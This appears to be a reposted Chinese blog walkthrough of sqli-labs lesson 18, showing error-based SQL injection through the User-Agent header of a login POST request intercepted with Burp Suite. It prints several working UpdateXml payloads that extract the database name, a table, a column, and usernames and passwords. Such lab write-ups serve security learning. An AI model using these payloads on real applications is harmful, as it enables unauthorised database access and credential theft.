sqli-labs less18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)

Posted superkrissv

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs less18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)相关的知识,希望对你有一定的参考价值。

技术分享图片

这次username和password都进行了输入校验

技术分享图片

但是ip和uagent没有校验

技术分享图片

当我们用admin admin登陆成功后,就会一条插入语句

技术分享图片

技术分享图片

由于程序无条件的信任了浏览器的header信息,那么通过修改http包的header信息构造注入

使用burpsuite进行包拦截/修改

技术分享图片

技术分享图片

 

 修改user-agent字段,加个单引号

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0‘

技术分享图片

利用UpdateXml函数报错来显示数据

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,database(),0x7e),1),1,1)#

技术分享图片

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),0x7e),1),1,1)#

技术分享图片

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘users‘ and table_schema=‘security‘ limit 0,1 ),0x7e),1),1,1)#

技术分享图片

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,(select username from (select username from users limit 2,1) a),0x7e),1),1,1)#

技术分享图片

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,(select password from (select password from users limit 2,1) a),0x7e),1),1,1)#

技术分享图片

 

以上是关于sqli-labs less18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs less19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

sqli-labs less11-12(post型union注入)

sqli-labs less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)

sqli-labs less13 POST - Double Injection - Single quotes- String -twist (POST型单引号变形双注入)

sqli-labs less42 POST -Error based -String -Stacked(POST型基于错误的堆叠查询字符型注入)

sqli-labs less45 POST -Error based -String -Stacked Blind(POST型基于盲注的堆叠字符型注入)